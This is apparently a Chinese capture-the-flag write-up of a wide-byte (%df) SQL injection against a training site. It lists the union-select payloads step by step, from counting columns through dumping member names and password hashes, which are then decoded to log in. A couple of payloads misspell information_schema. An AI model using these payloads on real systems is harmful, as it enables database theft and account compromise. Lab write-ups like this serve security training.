添加 ‘ 和 “ 进行测试发现页面没有任何反应
    单引号没有反应.PNG
    发现 ?id=-1时页面不回显信息
    负号没回显.PNG
    使用宽字节测试发现页面报错
    宽字节测试.PNG

    用语句 ?id=1 and 1=1 --+?id=1 and 1=2 --+ 判断出是宽字节注入
    判断1.PNG判断2.PNG

    用语句 ?id=1%df' order by 6 --+ 页面报错判断出字段数为5
    字段数6.PNG
    用语句 ?id=-1%df' union select 1,1,1,1,1 --+ 判断出回显位置是 2 和 5
    回显位置.PNG

    用语句?id=-1%df' union select 1,version(),1,1,database() --+查询到数据库名和版本信息
    数据库.PNG

    用语句 ?id=-1%df' union select 1,1,1,1,group_concat(table_name) from imformation_schema.tables where table_schema=database() --+ 查出数据库表
    表.PNG
    用语句 ?id=-1%df' union select 1,1,1,1,group_concat(column_name) from imformation_schema.columns where table_name=%df'stormgroup_member%df' --+ 发现文字会被带入数据库
    带入文字.PNG
    将表转换为16进制从而不用单引号 ?id=-1%df' union select 1,1,1,1,group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572 --+
    列.PNG
    用语句 ?id=-1%df' union select 1,1,1,1,group_concat(name,0x7e,password) from mozhe_discuz_stormgroup.stormgroup_member --+ 爆字段值
    字段值.PNG

    将字段值进行MD5解码得到:
    MD5.PNG

    登录得到key:
    key.PNG